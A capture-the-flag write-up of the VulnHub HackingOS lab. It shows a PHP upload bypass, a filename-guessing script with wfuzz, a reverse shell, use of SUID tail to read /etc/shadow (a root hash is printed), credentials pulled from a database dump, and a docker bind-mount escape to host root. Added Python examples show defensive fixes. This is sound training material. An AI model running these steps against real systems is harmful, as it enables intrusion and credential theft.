vulnhub hackingOS writeup

https://www.vulnhub.com/entry/hackinos-1,295/
running sparta gave me port 22 and 8000. on 8000 i found a defunct wordpress which pointed to localhost; that could be fixed by locally assigning localhost to the vm's network ip.
i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.
nikto revealed some interesting info:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.101:8000/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/upload.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
the /upload.php is interesting, it's an image upload function. i started uploading png images with a php reverse shell embedded in them. that didn't work out:
Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25
🙂
at some point i found the hint hidden in the html code: <!-- https://github.com/fatihhcelik/Vulnerable-Machine—Hint -->
that revealed upload.php's code:

that makes it a lot easier. we can see that the file is renamed to the md5 of the filename concatenated with a random number from 1 to 100 (the original extension is kept).
the script checks the mime type of the uploaded file but not the extension; allowed are the gif and png mime types.
so i created a random png image with gimp, opened it in a hex editor and put a php reverse shell in it. the upload wouldn't work -.- after learning and experimenting i found that a gif works like this:
cat cmd.php
GIF89a;
#
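to make the two weaknesses in that upload logic concrete, here is an added example (my own python, not upload.php from the machine and not code from the hint repo). it models the check the write-up describes, a validator that only sniffs magic bytes and stores the file as md5(filename + n) with n in 1..100, beside a hardened version that also requires an allow-listed extension matching the sniffed type and picks an unguessable stored name. the sample bytes and all function names are constructed for this demo.

```python
import hashlib
import os
import secrets

# Constructed sample: a GIF header followed by a PHP stub, the shape of file the
# write-up uploads. The magic bytes say "image/gif", the client name says ".php".
SAMPLE_GIF_PHP = b"GIF89a;\n<?php echo 'x'; ?>\n"
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # PNG signature plus padding

ALLOWED_MIME = {"image/gif", "image/png"}
EXT_FOR_MIME = {"image/gif": ".gif", "image/png": ".png"}


def sniff_mime(data):
    """Content sniffing by magic bytes, the only thing the weak check looks at."""
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "image/gif"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    return None


def weak_stored_name(filename, data):
    """The scheme the write-up describes: MIME check only, client extension kept,
    basename replaced by md5(filename + n) for a random n in 1..100.
    Returns the stored name, or None if the MIME check fails."""
    if sniff_mime(data) not in ALLOWED_MIME:
        return None
    n = secrets.randbelow(100) + 1
    ext = os.path.splitext(filename)[1]
    return hashlib.md5((filename + str(n)).encode()).hexdigest() + ext


def weak_name_candidates(filename):
    """Every stored name the weak scheme can produce: only 100, so the stored
    file is found with a tiny wordlist (this is what the write-up's script does)."""
    ext = os.path.splitext(filename)[1]
    return [hashlib.md5((filename + str(n)).encode()).hexdigest() + ext
            for n in range(1, 101)]


def hardened_stored_name(filename, data):
    """Same sniffing, plus: the client extension must be on the allow-list and
    must match the sniffed type, and the stored name is 128 bits of randomness
    with the extension taken from the content, never from the client."""
    mime = sniff_mime(data)
    if mime not in ALLOWED_MIME:
        return None
    client_ext = os.path.splitext(filename)[1].lower()
    if client_ext != EXT_FOR_MIME[mime]:
        return None
    return secrets.token_hex(16) + EXT_FOR_MIME[mime]
```

the weak scheme fails twice: it trusts the client's extension (so the stored file stays a .php) and its name space is 100 values. the hardened version fixes both, but two server-side measures still belong next to it: re-encoding the image through an image library before storing it, which drops anything embedded after the pixel data, and serving the uploads directory with script execution disabled.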

now we get to launch the shell, and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.php followed by 1 to 100 (cmd.phpXXX):

#!/usr/bin/python3
import hashlib

# the uploaded filename (e.g. cmd.php) is read from stdin
textToEncode = input()
bisHundert = 1
# upload.php stores the file as md5(<filename><n>) with n from 1 to 100,
# so print all 100 candidate names, one per line
while bisHundert <= 100:
    toEncode = textToEncode + str(bisHundert)
    print(hashlib.md5(toEncode.encode('utf-8')).hexdigest())
    bisHundert += 1

$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
cmd.php
thomsane@anansi:~/python$ cat cmdphphashes.txt
04292b8d46833c395942086e6ed2cd2c
d44843c7108897d25a243ffc3cd1edb7
(…)
180134430544955d54b576c726c76217
now we can feed wfuzz the payloads stored in the text file.
$ sudo wfuzz -w python/cmdphphashes.txt --hc 404 http://192.168.56.101:8000/uploads/FUZZ.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.101:8000/uploads/FUZZ.php
Total requests: 100
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000024: C=200 3 L 16 W 165 Ch "39b07a3be178f1249b64f60105360c4b"
Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165
and it found our "picture" at
http://192.168.56.101:8000/uploads/39b07a3be178f1249b64f60105360c4b.php
and my listener received the shell 🙂 which i upgraded to a real tty with python -c 'import pty; pty.spawn("/bin/bash")' and started looking for priv esc possibilities.
i found /usr/bin/tail to have the SUID bit set and tried:
$ tail -n 100 /root/flag
Life consists of details..
well, that's not a flag, right? but no permission error either, whereas cat gives: cat: /root/flag: Permission denied
so the same trick reads /etc/shadow:
$ tail -c1G /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
enumerating further i found /etc/init.d/delete.sh:
$ cat /etc/init.d/delete.sh
#!/bin/bash
while [ 1 ]
do
rm -rf /var/www/html/uploads/*.php
sleep 300
done
okay… that was the fuck keeping burp suite intruder from finding the file, because of the speed throttling in the free edition. -.-
cat wp-config.php gave me the database credentials, and the database dump (dumpall.sql) contained this:
LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES ('hummingbirdscyber','e10adc3949ba59abbe56e057f20f883e');
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;
UNLOCK TABLES;
INSERT INTO `wp_users` VALUES (1,'Handsome_Container','$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0','handsome_container','pupetofosu@ask-mail.com','','2019-02-23 15:49:54','',0,'Handsome_Container');
hummingbirdscyber
e10adc3949ba59abbe56e057f20f883e is the md5 of 123456
so i logged in via ssh:
hummingbirdscyber@vulnvm:~$
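why that table entry fell so quickly: an unsalted md5 of a password is a table lookup, not a cracking job. added example (my own python, not from the box): the leaked hash is matched against a small constructed wordlist, next to a salted, iterated PBKDF2 record as the credential should have been stored. the wordlist and the record format are my own.

```python
import hashlib
import hmac
import os

# The hash from the write-up's host_ssh_cred table: unsalted MD5 of the password.
LEAKED_MD5 = "e10adc3949ba59abbe56e057f20f883e"

# Constructed mini wordlist; a real check uses a large list of common passwords.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "admin"]


def lookup_unsalted_md5(hexdigest, wordlist):
    """Unsalted MD5 can be matched against a precomputed table: one hash per
    candidate, shared across every user. Returns the matching word or None."""
    target = hexdigest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def make_password_record(password, iterations=600_000):
    """Store a password as salt + PBKDF2-HMAC-SHA256 (constructed record
    format): each guess then costs `iterations` HMACs and the per-user salt
    makes a shared lookup table useless."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password_record(record, password):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown record format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)
```

the md5 side of this is exactly the write-up's observation; the point is the other half: with a random salt and a high iteration count the same password "123456" would still be weak, but it would have to be guessed online or per record, not recognised at a glance.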
well, well, well… i was in a container before! i noticed when i looked in /var/www/html here and only found an index.html. i had already suspected it when i looked at the mounts in the container…
[+] Current User
hummingbirdscyber
[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
ok, we are in the docker group… so basically root already.
let's look at what containers are running

hummingbirdscyber@vulnvm:~$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days 0.0.0.0:8000->80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists on the host to elevate my privileges:
hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu
now we run a new container with the / filesystem of the host mounted at /hostOS
root@c50ed36b8d25:/hostOS/root# cat flag

Congratulations!
                              -ys-
                                /mms.
                                  +NMd+`
                               `/so/hMMNy-
                                 `+mMMMMMMd/           ./oso/-
                                  `/yNMMMMMMMMNo`   .`   +-
                                  .oyhMMMMMMMMMMN/.     o.
                                    `:+osysyhddhs`    `o`
                                     .:oyyhshMMMh.   .:
                                  `-//:. `:sshdh: `
                                             -so:.
                                            .yy.
                                          :odh
                                        +o--d`
                                      /+. .d`
                                    -/`  `y`
                                  `:`   `/
                                 `.     `
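on the defensive side, both things that made this last step trivial, a regular user in the docker group and a bind mount of the host's /, are things an audit should catch. added example (my own python, not part of the box or the write-up): it reads docker-group members from an /etc/group excerpt and flags containers whose inspect data shows the privileged flag or a bind mount of a sensitive host path. the sample data is constructed to mirror the write-up (docker gid 129, the / -> /hostOS mount); the container names other than the two from docker ps are made up.

```python
# Constructed sample shaped like the fields `docker inspect` returns
# (Name, Mounts[].Type/Source/Destination, HostConfig.Privileged).
# The first entry mirrors the container started with -v /:/hostOS.
SAMPLE_CONTAINERS = [
    {"Name": "/ubuntu_hostos",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostOS"}],
     "HostConfig": {"Privileged": False}},
    {"Name": "/experimental_wordpress_1",
     "Mounts": [{"Type": "volume",
                 "Source": "/var/lib/docker/volumes/wp/_data",
                 "Destination": "/var/www/html"}],
     "HostConfig": {"Privileged": False}},
    {"Name": "/experimental_db_1",
     "Mounts": [{"Type": "volume",
                 "Source": "/var/lib/docker/volumes/db/_data",
                 "Destination": "/var/lib/mysql"}],
     "HostConfig": {"Privileged": False}},
]

# Constructed /etc/group excerpt; gid 129 is the docker gid from the id output.
SAMPLE_ETC_GROUP = """root:x:0:
adm:x:4:syslog,hummingbirdscyber
docker:x:129:hummingbirdscyber
"""

# Host paths that give a container's root user control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/proc", "/sys",
                        "/var/run/docker.sock")


def _under(path, prefix):
    """True if path is prefix itself or lies below it ("/" only matches "/")."""
    return path == prefix or (prefix != "/" and path.startswith(prefix + "/"))


def risky_mounts(container):
    """Bind mounts whose host source is a sensitive path, as (source, destination)."""
    hits = []
    for m in container.get("Mounts", []):
        if m.get("Type") != "bind":
            continue  # named volumes live under /var/lib/docker, not host dirs
        src = m.get("Source", "")
        if any(_under(src, p) for p in SENSITIVE_HOST_PATHS):
            hits.append((src, m.get("Destination")))
    return hits


def audit_containers(containers):
    """Map container name -> list of findings; containers with none are omitted."""
    findings = {}
    for c in containers:
        issues = []
        if c.get("HostConfig", {}).get("Privileged"):
            issues.append("privileged")
        for src, dst in risky_mounts(c):
            issues.append(f"bind mount {src} -> {dst}")
        if issues:
            findings[c["Name"].lstrip("/")] = issues
    return findings


def docker_group_members(etc_group_text):
    """Users listed in the docker group; each of them is effectively root."""
    for line in etc_group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []
```

in practice the container list would come from `docker inspect $(docker ps -q)` and the group file from the host; the write-up's own container shows up as the single finding, while the wordpress and mysql containers, which only use named volumes, stay quiet.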

that was fun 🙂 <3
